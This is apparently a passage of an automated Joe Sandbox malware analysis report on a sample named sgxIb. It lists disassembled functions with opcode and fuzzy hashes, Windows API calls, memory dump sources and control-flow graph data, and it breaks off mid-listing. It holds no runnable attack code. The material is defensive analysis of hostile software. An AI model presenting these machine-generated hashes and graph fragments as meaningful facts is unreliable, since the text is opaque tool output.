                                                                                                            • Opcode Fuzzy Hash: 34293327bee44d34c614d0b39119a60571c329d0eabe815e8b33a0ab77721304
                                                                                                            • Instruction Fuzzy Hash: 7E1126B19003499FCB10DFAAC845ADFBFF5EF88324F108419E519A7250CB75A954CFA5
                                                                                                            Function 06E92FF0 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 70a84678d69cd1d38aff39506836b9852278996f97ee84d80a8ca2759ac8cc33
                                                                                                            • Instruction ID: 9264d3cbe120bdc67e929c854223092cd63dfbdf335d9117af761e292f4a9cab
                                                                                                            • Opcode Fuzzy Hash: 70a84678d69cd1d38aff39506836b9852278996f97ee84d80a8ca2759ac8cc33
                                                                                                            • Instruction Fuzzy Hash: C21143B1D003088BCB20DFAAD8457DEFBF5EF88324F20841AD519A7240DA79A944CFA4
                                                                                                            Function 06E92FF8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 2933d999ff7d14eb36de19e6c518c3d7c908d9a108275c759241a2e7fa4b6542
                                                                                                            • Instruction ID: c0d46f18f416f0b0f627ab0948fa21c7175912e785527c11635517e3a72d2b47
                                                                                                            • Opcode Fuzzy Hash: 2933d999ff7d14eb36de19e6c518c3d7c908d9a108275c759241a2e7fa4b6542
                                                                                                            • Instruction Fuzzy Hash: 351125B1D003488BCB20DFAAC84579EFBF5EF88324F208419D519A7240DA75A944CBA5
                                                                                                            Function 00C5C238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C5C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: e61eb863b0b5dcfd714a178973c2674734cfbd8bfa147fb517178cd8ec63580f
                                                                                                            • Instruction ID: 7c554c8358996701aa6c9874ad50dfbc8fee466f41d021ea705acafd549e869b
                                                                                                            • Opcode Fuzzy Hash: e61eb863b0b5dcfd714a178973c2674734cfbd8bfa147fb517178cd8ec63580f
                                                                                                            • Instruction Fuzzy Hash: D311E0B5C003498FCB10DF9AD884ADEFBF5EB88324F10841AD829A7210D775A649CFA5
                                                                                                            Function 06E956EB Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 06E9574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 216ee2b6c47839960efb5bb3f356cb4e5290d234d4d7c272484cad5d0e8a6c3d
                                                                                                            • Instruction ID: 77af9a3390bae97373e0c76c6a0c998d257d51469e729c73b96c21c9632113fd
                                                                                                            • Opcode Fuzzy Hash: 216ee2b6c47839960efb5bb3f356cb4e5290d234d4d7c272484cad5d0e8a6c3d
                                                                                                            • Instruction Fuzzy Hash: DE11C2B58003499FDB10DF9AD989BDEBFF8EB48320F14841AE519A7340C375A644CFA5
                                                                                                            Function 06E956F0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 06E9574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 83f9aa36a6def6f121e2220a387914e0eb1e0d686afc93681f8d731a97917f34
                                                                                                            • Instruction ID: 8e38ad5641613281b151f82db716fad5829e0ffd2377a8d5053601a670369431
                                                                                                            • Opcode Fuzzy Hash: 83f9aa36a6def6f121e2220a387914e0eb1e0d686afc93681f8d731a97917f34
                                                                                                            • Instruction Fuzzy Hash: 6011D3B5800349DFDB10DF9AD985BDEBBF8EB48320F10841AD519A7340C375A644CFA5
                                                                                                            Function 06E956E8 Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 06E9574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 56d3060214a275b5003ad634dc7f43f4d9a76129d86a61781997563a084feced
                                                                                                            • Instruction ID: 5cc7329b2aaa39105831f2f21e5907c0249f738a5f58b1ccb2915f13e9fcb566
                                                                                                            • Opcode Fuzzy Hash: 56d3060214a275b5003ad634dc7f43f4d9a76129d86a61781997563a084feced
                                                                                                            • Instruction Fuzzy Hash: A4E03972804348CEDB12AF99E4493DAFFF0AF55224F24C44AC159A3291C2781298CBA2
                                                                                                            Function 00C5FF30 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00C5FF88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 28318b47b6cc7088a7b3d4dba6927b23517e34c8870f3fa8e9d2295ead8fe0a7
                                                                                                            • Instruction ID: c1836511a0067afd2c4703538720d08168db8793d239ff4cb30b6c37e4db50a7
                                                                                                            • Opcode Fuzzy Hash: 28318b47b6cc7088a7b3d4dba6927b23517e34c8870f3fa8e9d2295ead8fe0a7
                                                                                                            • Instruction Fuzzy Hash: B31115B58003498FCB10DF9AC545BDEBBF5EB48320F10842AD969A7741D778AA84CFA5
                                                                                                            Function 00BFD4A0 Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b61a74bf5a45a77fa19fb9226582575187517ee44a31be370920160372bcac8
                                                                                                            • Instruction ID: 5db854e195daf5c09e4efe3b8008acf9541acc25b300a1109cbc729d276c1a77
                                                                                                            • Opcode Fuzzy Hash: 6b61a74bf5a45a77fa19fb9226582575187517ee44a31be370920160372bcac8
                                                                                                            • Instruction Fuzzy Hash: EF2128B1504208DFDB05DF14D9C0B36BFA6FBA4328F24C5A9DA0A0B356C336D81AD7A1
                                                                                                            Function 00C0D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d68b390c8eb4428557f745999f197565b04abc33d68fc03f2e7cca3b1bc92447
                                                                                                            • Instruction ID: 72b034c6ecebb74ff4bad8fe802c856cf309e46c0b8a2af203d805d1901d6c3f
                                                                                                            • Opcode Fuzzy Hash: d68b390c8eb4428557f745999f197565b04abc33d68fc03f2e7cca3b1bc92447
                                                                                                            • Instruction Fuzzy Hash: 2121F2B1604300EFDB05DF94D9C4B26BBA5FB94314F24CAADE90B4B292C336DC56CA61
                                                                                                            Function 00C0D01C Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01442f0c8432fbaadf7845d38beaa40781c34825f5f75124e230a1c28ea51810
                                                                                                            • Instruction ID: c2d58b4e4da36146d6803ec10b5069bec60fba97db8b98d23f9c806e5c7d86d9
                                                                                                            • Opcode Fuzzy Hash: 01442f0c8432fbaadf7845d38beaa40781c34825f5f75124e230a1c28ea51810
                                                                                                            • Instruction Fuzzy Hash: 2521D375604200DFDB14DF54D9C4B16BBA5EB94318F24C569D80F4B286C336D807CA61
                                                                                                            Function 00C0D005 Relevance: .1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 58ea92a844ccab269c03f46e8cfc128d8b37068d3d80743c405986ea5ec7f6a4
                                                                                                            • Instruction ID: a429ef6ea374975c7803b30aac83f3b681cf2a0539ee91fba79f8753a49ab2b4
                                                                                                            • Opcode Fuzzy Hash: 58ea92a844ccab269c03f46e8cfc128d8b37068d3d80743c405986ea5ec7f6a4
                                                                                                            • Instruction Fuzzy Hash: 0F2192755093C08FCB02CF24D994715BF71EB46314F28C5EAD84A8F6A7C33A980ACB62
                                                                                                            Function 00BFD49B Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction ID: cd6aa290108190084074da27c940c488e2629965589cb24786bdf80f2eb4c565
                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction Fuzzy Hash: 2211D676504244CFDB16CF14D5C4B26BFB2FB94324F24C5A9D9050B256C336D85ACB91
                                                                                                            Function 00C0D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: ed1862ff1d54f15173c9f0d5364789576724f3948bbade34557fc39d4ad34235
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: BB11DD75904280DFCB02CF54C5C4B15FBB2FB84324F24C6ADD84A4B696C33AD94ACB61
                                                                                                            Function 00BFD759 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5052b7e88a4f9599d46465dca8d96fe511dbde8743b847ac25bfc3175a59d37
                                                                                                            • Instruction ID: 3606d4350cff4529c90b3476910bfb14f4207e28418be991d5b1591e26a01eb6
                                                                                                            • Opcode Fuzzy Hash: f5052b7e88a4f9599d46465dca8d96fe511dbde8743b847ac25bfc3175a59d37
                                                                                                            • Instruction Fuzzy Hash: 6301D4711083489AE7106B15DCC4B36FFD9DF51321F18C99AEE090F286C6299C44CB71
                                                                                                            Function 00BFD758 Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 041c681bfce35cdaa4498f576d7f2deb577e893b03fffd9d42e291ba4147dd01
                                                                                                            • Instruction ID: 4e14550925701cfb1439acdcc47b3db629a2275b1e1c67272f1c14e6bcb0b8d0
                                                                                                            • Opcode Fuzzy Hash: 041c681bfce35cdaa4498f576d7f2deb577e893b03fffd9d42e291ba4147dd01
                                                                                                            • Instruction Fuzzy Hash: A4F0AF310043449AE7209B06DC84B62FFE8EB50724F18C59AED080F28AC279AC44CBA0

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.6%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:17
                                                                                                            Total number of Limit Nodes:4
                                                                                                            execution_graph 26070 fe0848 26072 fe084e 26070->26072 26071 fe091b 26072->26071 26074 fe1340 26072->26074 26076 fe1343 26074->26076 26075 fe1454 26075->26072 26076->26075 26078 fe80f9 26076->26078 26079 fe8103 26078->26079 26080 fe81b9 26079->26080 26083 685fa88 26079->26083 26087 685fa78 26079->26087 26080->26076 26085 685fa9d 26083->26085 26084 685fcae 26084->26080 26085->26084 26086 685fcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 26085->26086 26086->26085 26088 685fa88 26087->26088 26089 685fcae 26088->26089 26090 685fcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 26088->26090 26089->26080 26090->26088

                                                                                                            Executed Functions

                                                                                                            Function 06853580 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 125 6853580-68535a1 126 68535a3-68535a6 125->126 127 6853d47-6853d4a 126->127 128 68535ac-68535cb 126->128 129 6853d70-6853d72 127->129 130 6853d4c-6853d6b 127->130 138 68535e4-68535ee 128->138 139 68535cd-68535d0 128->139 131 6853d74 129->131 132 6853d79-6853d7c 129->132 130->129 131->132 132->126 135 6853d82-6853d8b 132->135 143 68535f4-6853603 138->143 139->138 140 68535d2-68535e2 139->140 140->143 254 6853605 call 6853da0 143->254 255 6853605 call 6853d9b 143->255 144 685360a-685360f 145 6853611-6853617 144->145 146 685361c-68538f9 144->146 145->135 167 68538ff-68539ae 146->167 168 6853d39-6853d46 146->168 177 68539d7 167->177 178 68539b0-68539d5 167->178 180 68539e0-68539f3 call 685316c 177->180 178->180 183 6853d20-6853d2c 180->183 184 68539f9-6853a1b call 6853178 180->184 183->167 185 6853d32 183->185 184->183 188 6853a21-6853a2b 184->188 185->168 188->183 189 6853a31-6853a3c 188->189 189->183 190 6853a42-6853b18 189->190 202 6853b26-6853b56 190->202 203 6853b1a-6853b1c 190->203 207 6853b64-6853b70 202->207 208 6853b58-6853b5a 202->208 203->202 209 6853bd0-6853bd4 207->209 210 6853b72-6853b76 207->210 208->207 211 6853d11-6853d1a 209->211 212 6853bda-6853c16 209->212 210->209 213 6853b78-6853ba2 210->213 211->183 211->190 225 6853c24-6853c32 212->225 226 6853c18-6853c1a 212->226 220 6853ba4-6853ba6 213->220 221 6853bb0-6853bcd call 6853184 213->221 220->221 221->209 228 6853c34-6853c3f 225->228 229 6853c49-6853c54 225->229 226->225 228->229 232 6853c41 228->232 233 6853c56-6853c5c 229->233 234 6853c6c-6853c7d 229->234 232->229 235 6853c60-6853c62 233->235 236 6853c5e 233->236 238 6853c95-6853ca1 234->238 239 6853c7f-6853c85 234->239 235->234 236->234 243 6853ca3-6853ca9 238->243 244 6853cb9-6853d0a 238->244 240 6853c87 239->240 241 6853c89-6853c8b 239->241 240->238 241->238 245 6853cad-6853caf 243->245 246 6853cab 243->246 244->211 245->244 246->244 254->144 255->144
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 4572da186588188c901997ccb134116c9da05b407c98703c59ffdd57c79f5b82
                                                                                                            • Instruction ID: 67656600ec76d6e1bed6693ba8121afdda0310120f396444a3fcdd44d4766ea4
                                                                                                            • Opcode Fuzzy Hash: 4572da186588188c901997ccb134116c9da05b407c98703c59ffdd57c79f5b82
                                                                                                            • Instruction Fuzzy Hash: E1324031E1071A8FCB14EF75D8546ADB7B6FF89300F5186A9D40AAB254EF30AD85CB81
                                                                                                            Function 06857E98 Relevance: 3.0, Strings: 2, Instructions: 471COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 709 6857e98-6857eb6 710 6857eb8-6857ebb 709->710 711 6857ebd-6857ed7 710->711 712 6857edc-6857edf 710->712 711->712 713 6857ef6-6857ef9 712->713 714 6857ee1-6857eef 712->714 715 6857f1c-6857f1f 713->715 716 6857efb-6857f17 713->716 725 6857ef1 714->725 726 6857f3e-6857f54 714->726 718 6857f21-6857f2b 715->718 719 6857f2c-6857f2e 715->719 716->715 722 6857f35-6857f38 719->722 723 6857f30 719->723 722->710 722->726 723->722 725->713 729 685816f-6858179 726->729 730 6857f5a-6857f63 726->730 731 6857f69-6857f86 730->731 732 685817a-68581af 730->732 739 685815c-6858169 731->739 740 6857f8c-6857fb4 731->740 735 68581b1-68581b4 732->735 736 68583e9-68583ec 735->736 737 68581ba-68581c9 735->737 741 685840f-6858412 736->741 742 68583ee-685840a 736->742 749 68581e8-685822c 737->749 750 68581cb-68581e6 737->750 739->729 739->730 740->739 764 6857fba-6857fc3 740->764 744 68584bd-68584bf 741->744 745 6858418-6858424 741->745 742->741 746 68584c6-68584c9 744->746 747 68584c1 744->747 753 685842f-6858431 745->753 746->735 752 68584cf-68584d8 746->752 747->746 765 6858232-6858243 749->765 766 68583bd-68583d3 749->766 750->749 758 6858433-6858439 753->758 759 6858449-685844d 753->759 760 685843d-685843f 758->760 761 685843b 758->761 762 685844f-6858459 759->762 763 685845b 759->763 760->759 761->759 767 6858460-6858462 762->767 763->767 764->732 768 6857fc9-6857fe5 764->768 774 6858249-6858266 765->774 775 68583a8-68583b7 765->775 766->736 772 6858464-6858467 767->772 773 6858473-68584ac 767->773 779 6857feb-6858015 768->779 780 685814a-6858156 768->780 772->752 773->737 794 68584b2-68584bc 773->794 774->775 786 685826c-6858362 call 68566b8 774->786 775->765 775->766 792 6858140-6858145 779->792 793 685801b-6858043 779->793 780->739 780->764 842 6858364-685836e 786->842 843 6858370 786->843 792->780 793->792 800 6858049-6858077 793->800 800->792 806 685807d-6858086 800->806 806->792 808 685808c-68580be 806->808 815 68580c0-68580c4 808->815 816 68580c9-68580e5 808->816 815->792 817 68580c6 815->817 816->780 818 68580e7-685813e call 68566b8 816->818 817->816 818->780 844 6858375-6858377 842->844 843->844 844->775 845 6858379-685837e 844->845 846 6858380-685838a 845->846 847 685838c 845->847 848 6858391-6858393 846->848 847->848 848->775 849 6858395-68583a1 848->849 849->775
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: eece72e5f807df38cf676b7127ce4f0db813a13c27f1c7d807ab16e79d8ee753
                                                                                                            • Instruction ID: 4f020e323c9291020e0de28bebd9b37a0a621c9e093f7bde94cd7cbd044c5a46
                                                                                                            • Opcode Fuzzy Hash: eece72e5f807df38cf676b7127ce4f0db813a13c27f1c7d807ab16e79d8ee753
                                                                                                            • Instruction Fuzzy Hash: 9D029F70B002258FDB54DB78D9546AEB7E2FF84304F15896AE909DB394DB71EC82CB81
                                                                                                            Function 06850040 Relevance: 2.0, Instructions: 1971COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dec7a50b3b05f5493ae64176125a7dca5de9b8de5b6ffea74493caedc7286857
                                                                                                            • Instruction ID: 45e48a39074b6fa59a0549e1897f562c9c6fa20e1d165fcc364e4aac27246650
                                                                                                            • Opcode Fuzzy Hash: dec7a50b3b05f5493ae64176125a7dca5de9b8de5b6ffea74493caedc7286857
                                                                                                            • Instruction Fuzzy Hash: AC230A31D10B198ACB11EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                                            Function 0685001D Relevance: 2.0, Instructions: 1956COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da57bf2f26ef94a64ab8bbbc13ea2c89e7e7ef43131b66e40599a70d34997d16
                                                                                                            • Instruction ID: 90fe188cff548005182223b0b37b2ef2a76ad75278c04c12d4fb34ab5c573c81
                                                                                                            • Opcode Fuzzy Hash: da57bf2f26ef94a64ab8bbbc13ea2c89e7e7ef43131b66e40599a70d34997d16
                                                                                                            • Instruction Fuzzy Hash: DC130A31D10B198ACB15EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC4CB41
                                                                                                            Function 068556B0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2245 68556b0-68556cd 2246 68556cf-68556d2 2245->2246 2247 68556d4-68556da 2246->2247 2248 685570a-685570d 2246->2248 2249 68556e0-68556e8 2247->2249 2250 6855893-68558c3 2247->2250 2251 6855714-6855717 2248->2251 2252 685570f-6855711 2248->2252 2249->2250 2253 68556ee-68556fb 2249->2253 2267 68558cd-68558d0 2250->2267 2254 6855719-6855726 2251->2254 2255 685572b-685572e 2251->2255 2252->2251 2253->2250 2259 6855701-6855705 2253->2259 2254->2255 2256 6855741-6855744 2255->2256 2257 6855730-6855736 2255->2257 2262 6855746-685574d 2256->2262 2263 6855752-6855755 2256->2263 2260 685582d-6855837 2257->2260 2261 685573c 2257->2261 2259->2248 2272 685583e-6855840 2260->2272 2261->2256 2262->2263 2265 6855757-685575d 2263->2265 2266 6855768-685576b 2263->2266 2268 6855820-6855823 2265->2268 2269 6855763 2265->2269 2270 6855777-685577a 2266->2270 2271 685576d-6855776 2266->2271 2273 68558f2-68558f5 2267->2273 2274 68558d2-68558d6 2267->2274 2275 6855828-685582b 2268->2275 2269->2266 2279 685578d-6855790 2270->2279 2280 685577c-6855782 2270->2280 2276 6855845-6855848 2272->2276 2281 68558f7-68558fe 2273->2281 2282 6855909-685590c 2273->2282 2277 68559c2-68559d0 2274->2277 2278 68558dc-68558e4 2274->2278 2275->2260 2275->2276 2287 6855861-6855864 2276->2287 2288 685584a-685585c 2276->2288 2309 6855a00-6855a01 2277->2309 2310 68559d2-68559fc 2277->2310 2278->2277 2289 68558ea-68558ed 2278->2289 2283 6855792-6855793 2279->2283 2284 6855798-685579b 2279->2284 2280->2247 2290 6855788 2280->2290 2291 6855904 2281->2291 2292 68559ba-68559c1 2281->2292 2285 685592e-6855931 2282->2285 2286 685590e-6855912 2282->2286 2283->2284 2294 685579d-68557a1 2284->2294 2295 68557ac-68557af 2284->2295 2296 6855933-6855937 2285->2296 2297 685594f-6855952 2285->2297 2286->2277 2293 6855918-6855920 2286->2293 2287->2257 2299 685586a-685586d 2287->2299 2288->2287 2289->2273 2290->2279 2291->2282 2293->2277 2301 6855926-6855929 2293->2301 2302 6855885-6855892 2294->2302 2303 68557a7 2294->2303 2304 68557b1-68557b4 2295->2304 2305 68557b9-68557bc 2295->2305 2296->2277 2306 685593d-6855945 2296->2306 2307 6855954-6855965 2297->2307 2308 685596a-685596d 2297->2308 2299->2280 2300 6855873-6855875 2299->2300 2312 6855877 2300->2312 2313 685587c-685587f 2300->2313 2301->2285 2303->2295 2304->2305 2315 68557e2-68557e5 2305->2315 2316 68557be-68557dd 2305->2316 2306->2277 2314 6855947-685594a 2306->2314 2307->2308 2317 6855977-685597a 2308->2317 2318 685596f-6855976 2308->2318 2320 6855a03-6855a0a 2309->2320 2321 6855a0f-6855a12 2309->2321 2319 68559fe 2310->2319 2312->2313 2313->2246 2313->2302 2314->2297 2325 68557e7-68557f6 2315->2325 2326 68557fb-68557fe 2315->2326 2316->2315 2327 6855994-6855997 2317->2327 2328 685597c-6855980 2317->2328 2319->2309 2320->2321 2322 6855a18-6855bac 2321->2322 2323 6855cfb-6855cfe 2321->2323 2396 6855ce5-6855cf8 2322->2396 2397 6855bb2-6855bb9 2322->2397 2334 6855d16-6855d19 2323->2334 2335 6855d00-6855d13 2323->2335 2325->2326 2329 6855800-6855816 2326->2329 2330 685581b-685581e 2326->2330 2331 6855999-68559a3 2327->2331 2332 68559a8-68559aa 2327->2332 2328->2277 2336 6855982-685598a 2328->2336 2329->2330 2330->2268 2330->2275 2331->2332 2341 